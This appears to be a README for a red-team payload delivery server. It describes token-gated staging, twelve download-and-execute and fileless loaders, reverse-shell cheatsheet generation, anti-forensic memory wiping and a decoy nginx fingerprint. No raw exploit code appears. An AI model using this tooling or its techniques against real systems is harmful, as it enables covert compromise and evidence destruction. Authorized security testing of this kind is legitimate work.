Payload delivery server for authorized red team engagements.

Single Go binary, zero external dependencies. Wellspring manages payload staging over TLS with token-gated access, auto-expiry, and modular stager generation. Socat is the primary delivery method with fallbacks for curl, wget, python, netcat, perl, and fileless (memfd) execution.

Table of Contents

• Highlights
• Quick Start
• Usage
• Delivery Methods
• Stager Generation
• Architecture
• Security
• Project Structure
• Testing

---

Highlights

Token-Gated Access Every payload requires a valid token with configurable TTL, max uses, and source IP/CIDR lock. Tokens are HMAC-SHA256 keyed to prevent timing attacks on map lookup. Expired and exhausted tokens are purged automatically with sensitive field zeroing.	12 Delivery Methods Socat TLS, socat TCP, socat memfd, socat PTY, curl, wget, bash /dev/tcp, python urllib, netcat, perl IO::Socket::SSL, memfd_create fileless, and /dev/shm tmpfs staging. Every loader validates inputs against a strict per-field character whitelist.
Encrypt at Rest All payloads stored with AES-256-GCM encryption in memory. Plaintext is zeroed after delivery with runtime.KeepAlive to prevent compiler elision. Encryption keys and HMAC keys are zeroed on exit.	Dual TLS Listeners HTTPS on :443 serves payloads at GET /p/<token> for HTTP-based loaders. Raw TLS on :4443 reads a token from the first line and writes raw payload bytes for socat OPENSSL: connections. TLS 1.3 minimum, no downgrade.
Fileless Execution memfd_create loaders execute payloads entirely in memory -- no file touches disk. /dev/shm staging uses tmpfs for environments where memfd is unavailable. Both methods leave zero filesystem artifacts.	Anti-Forensics SIGINT/SIGTERM trigger immediate zeroing of all payloads, tokens, and cryptographic keys before exit. Token values are zeroed in-place via unsafe.StringData on revocation, expiry, and shutdown. Background goroutine enforces TTL purging.
Decoy Infrastructure All HTTP responses use Server: nginx/1.24.0 header. Invalid tokens and unknown paths return an identical nginx 404 decoy page. The server is indistinguishable from a default nginx installation to casual inspection.	Catppuccin Mocha Theme All CLI output uses the Catppuccin Mocha palette -- teal accents, mauve highlights, and surface tones throughout the interactive operator console, banner, delivery log, and stager output.

Quick Start

# Build
make build    # Static binary -> build/wellspring

# Generate TLS cert
./wellspring -gencert -sni cloudflare-dns.com

# Start server
./wellspring -cert server.crt -key server.key

# Interactive console opens -- load a payload and generate stagers:
#   payload add ./implant --name undertow
#   generate p1 all --host 10.0.0.1 --port 443

Usage

Startup Flags

Flag	Default	Description
-listen	:443	HTTPS listener address
-raw-listen	:4443	Raw TLS listener address
-cert / -key	(auto-gen)	TLS certificate and key paths
-sni	cloudflare-dns.com	SNI/CN for auto-generated cert
-decoy	(built-in)	Path to custom HTML decoy page
-gencert		Generate TLS cert and exit

Console Commands

Payload Management
  payload add <path> [--name N]       Load a binary (auto-detects OS/arch)
  payload list                        Show loaded payloads
  payload remove <id>                 Remove and zero memory

Stager Generation
  generate <id> <loader> [flags]      Generate one-liner stager
  generate <id> all [flags]           Generate ALL compatible stagers
    --host IP  --port PORT            Server address
    --ttl 1h  --single-use            Token constraints
    --max-uses N  --source-lock CIDR  Access restrictions

Information
  loaders                             List delivery methods
  tokens                              List active tokens
  token revoke <value>                Revoke a token
  callbacks                           Show delivery log
  cheatsheet --host IP --port PORT    Delivery technique reference

Control
  exit                                Shutdown + zero all payloads

Delivery Methods

Loader	Requires	Description
socat-tls	socat	OPENSSL pull + exec (raw TLS)
socat-tcp	socat	TCP pipe (no TLS)
socat-memfd	socat, python3	socat + memfd_create (fileless)
socat-pty	socat	PTY allocation for interactive bootstrap
curl	curl	HTTPS pull + exec
wget	wget	HTTPS pull + exec
bash-devtcp	bash	/dev/tcp raw pull (no external tools, no TLS)
python	python3	urllib HTTPS pull + exec
netcat	nc	Raw pull (no TLS)
perl	perl	IO::Socket::SSL HTTPS pull + exec
memfd	curl, python3	curl + memfd_create fileless execution
devshm	curl	/dev/shm staging (tmpfs, no disk write)

Stager Generation

Generate stagers for a loaded payload:

# Single loader
generate p1 curl --host 10.0.0.1 --port 443

# All compatible loaders at once
generate p1 all --host 10.0.0.1 --port 443

# With access restrictions
generate p1 socat-tls --host 10.0.0.1 --port 4443 --ttl 1h --single-use --source-lock 10.0.0.0/24

# Multiple uses with CIDR lock
generate p1 memfd --host 10.0.0.1 --port 443 --max-uses 5 --source-lock 192.168.1.0/24

Cheatsheet

Generate a standalone technique reference card — no payloads, no tokens, no server required:

cheatsheet --host 10.0.0.1 --port 443

Outputs all 12 delivery techniques as ready-to-use one-liners organized by category (Socat TLS, Socat TCP, HTTP/HTTPS, Raw TCP, Fileless) with host and port substituted in. Raw-protocol techniques (socat, bash /dev/tcp) become reverse shell commands. HTTP-based techniques (curl, wget, python, perl) use a <URL> placeholder for the operator's own file server.

Architecture

Dual TLS Listeners

• HTTPS (:443) -- Serves payloads at GET /p/<token> for HTTP-based loaders (curl, wget, python). All other paths return a decoy nginx 404 page.
• Raw TLS (:4443) -- After TLS handshake, reads token from first line, writes raw payload bytes. For socat OPENSSL: connections.

Request Flow

Operator                    Wellspring                    Target
   |                           |                            |
   |-- payload add ----------> |                            |
   |-- generate p1 curl -----> |                            |
   |   <-- one-liner stager -- |                            |
   |                           |                            |
   |   (operator sends stager to target via C2)             |
   |                           |                            |
   |                           | <-- GET /p/<token> ------- |
   |                           | -- validate token -->      |
   |                           | -- decrypt payload -->     |
   |                           | -- deliver + zero -------->|
   |                           |                            |

Security

• Token-gated access -- Payloads require valid tokens with configurable TTL, max uses, and source IP/CIDR lock.
• Encrypt at rest -- All payloads stored with AES-256-GCM encryption in memory.
• Memory zeroing -- Plaintext zeroed after delivery with runtime.KeepAlive to prevent compiler elision. Token values zeroed in-place via unsafe.StringData on revocation, expiry, and shutdown. Encryption keys and HMAC keys zeroed on exit.
• Signal handling -- SIGINT/SIGTERM trigger immediate zeroing of all payloads, tokens, and cryptographic keys before exit.
• Anti-timing -- Token store uses HMAC-SHA256 keyed hashing to prevent timing attacks on map lookup.
• Shell injection prevention -- All loader inputs validated against a strict per-field character whitelist (: allowed only in host for IPv6).
• TLS 1.3 minimum -- No downgrade to TLS 1.2. Session tickets disabled to prevent ticket extraction.
• HTTP hardening -- Read/write/idle timeouts prevent slowloris. Max header size capped at 64KB.
• Connection limiting -- Raw TLS listener capped at 128 concurrent connections via semaphore.
• Consistent fingerprint -- All HTTP responses use Server: nginx/1.24.0 header. Invalid tokens return identical decoy page.
• Auto-expiry -- Background goroutine purges expired/exhausted tokens with sensitive field zeroing.
• Payload size limit -- 100MB maximum enforced on load; only regular files accepted.

Project Structure

cmd/wellspring/main.go          Entry point, flags, server+CLI init
internal/
  server/
    server.go                   Dual TLS listener setup
    handlers.go                 /p/<token> delivery, raw TLS handler, decoy
    tls.go                      ECDSA P-256 self-signed cert generation
  payload/
    payload.go                  ELF/PE arch detection
    manager.go                  Add/remove/list/get with encrypt-at-rest
    token.go                    Token generation, validation, TTL, source-lock
    encrypt.go                  AES-256-GCM encryption
  loader/
    loader.go                   Loader interface, input validation
    registry.go                 Auto-registration via init()
    *.go                        12 delivery method implementations
  callback/tracker.go           In-memory delivery event log
  antiforensics/expiry.go       Background TTL enforcer, memory zeroing
  cli/
    cli.go                      Interactive operator console
    banner.go                   ASCII art banner
    colors.go                   Catppuccin Mocha palette
  theme/theme.go                Shared ANSI color constants

Testing

go test ./... -race -count=1 -v

53 tests covering payload encryption, token lifecycle, arch detection, shell injection prevention, HTTPS delivery, raw TLS delivery, server header consistency, ring buffer compaction, and anti-forensics.

Requires Go 1.21+.

---

Wellspring -- payload delivery for authorized red team engagements.

Highlights · Quick Start · Usage · Delivery Methods · Security

Wellspring -- payloads where they need to be

This tool is intended exclusively for authorized red team engagements and security testing with proper written authorization. Unauthorized use against systems you do not own or have permission to test is illegal.